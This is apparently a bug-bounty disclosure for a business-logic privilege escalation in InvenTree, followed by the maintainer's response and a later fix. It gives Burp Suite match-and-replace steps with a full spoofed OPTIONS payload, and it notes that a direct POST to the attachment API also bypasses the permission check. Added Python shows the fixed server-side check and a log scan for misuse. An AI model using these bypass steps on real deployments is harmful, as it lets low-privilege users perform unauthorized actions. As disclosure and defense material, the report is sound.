Privilege Escalation via edit response body in inventree/inventree

Valid

Reported on

Jun 17th 2022


Description

Recently, I found a business logic vulnerability that allows a reader user to perform privilege escalation to an all-access user. Before the user performs any function, the client side sends an OPTIONS request to view the user's permissions for the specified function via the response body. If the attacker can manipulate the response body, the attacker can modify it and access sensitive functions.

Steps to reproduce

1 - A reader user cannot perform the Add Link function.


2 - In Burp Suite, go to Proxy > Options > Match and Replace, and click Add.

Replace "actions":{"GET":true} with "actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}

And click OK.

3 - Try the Add Link function again with the reader account, and it succeeds!


Impact

This vulnerability allows an attacker with low privileges to perform high-privilege actions and access sensitive functions.

We are processing your report and will contact the inventree team within 24 hours. 8 days ago
Nhien.IT modified the report
8 days ago
Oliver modified the Severity from Critical (9.4) to Medium (6.5) 8 days ago
Oliver
8 days ago

Maintainer


Thanks for reporting this. I have found that there is an even easier way to reproduce this:

Simply navigate to the appropriate API URL e.g. /api/part/attachment/ and an authenticated user who nominally cannot create or edit attachments can issue a POST request against this endpoint. No manipulation of front-end code is required.

We will have a fix out for this ASAP, thanks again for reporting.
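The maintainer's point is that the client-side OPTIONS metadata was the only gate, and the server accepted the POST regardless. The following is an added example, not InvenTree's code: a hypothetical role table with the pre-fix and post-fix view logic side by side, plus a scan over constructed access-log lines (format assumed) to find writes that slipped through before the fix.

```python
import re
from dataclasses import dataclass

# Hypothetical role table (not InvenTree's real model): methods each role may use.
# The OPTIONS "actions" metadata should be derived from this, never the reverse.
ROLE_METHODS = {
    "reader": {"GET", "HEAD", "OPTIONS"},
    "allaccess": {"GET", "HEAD", "OPTIONS", "POST", "PUT", "PATCH", "DELETE"},
}
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

@dataclass
class Request:
    method: str
    role: str
    path: str = "/api/part/attachment/"

def vulnerable_view(req: Request) -> int:
    # Before the fix: no server-side check; the front end merely hides the button.
    return 201 if req.method == "POST" else 200

def fixed_view(req: Request) -> int:
    # After the fix: the server consults its own role table on every request;
    # whatever "actions" the client saw in OPTIONS (or rewrote) is ignored.
    if req.method not in ROLE_METHODS.get(req.role, set()):
        return 403
    return 201 if req.method == "POST" else 200

LOG_RE = re.compile(r"user=(\S+) role=(\S+) method=(\S+) path=(\S+) status=(\d)")

def find_unauthorized_writes(lines):
    # Flag successful write requests from roles that may not write: a retroactive
    # check for whether the gap was used before the fix landed.
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        user, role, method, path, status_class = m.groups()
        if (method in WRITE_METHODS and status_class == "2"
                and method not in ROLE_METHODS.get(role, set())):
            hits.append((user, method, path))
    return hits

# Constructed sample access-log lines (format is assumed, not InvenTree's).
SAMPLE_LOG = [
    "2022-06-17T10:01:02Z user=alice role=allaccess method=POST path=/api/part/attachment/ status=201",
    "2022-06-17T10:02:15Z user=bob role=reader method=GET path=/api/part/attachment/ status=200",
    "2022-06-17T10:03:40Z user=bob role=reader method=POST path=/api/part/attachment/ status=201",
]
```

Running `find_unauthorized_writes(SAMPLE_LOG)` flags only bob's POST; alice's write is within her role and bob's GET is a permitted read.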

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Oliver validated this vulnerability 8 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver confirmed that a fix has been merged on 12fccc 8 days ago
Oliver has been awarded the fix bounty
Nhien.IT
8 days ago

Researcher


Hi @mainter,

any bounty for this vulnerability?
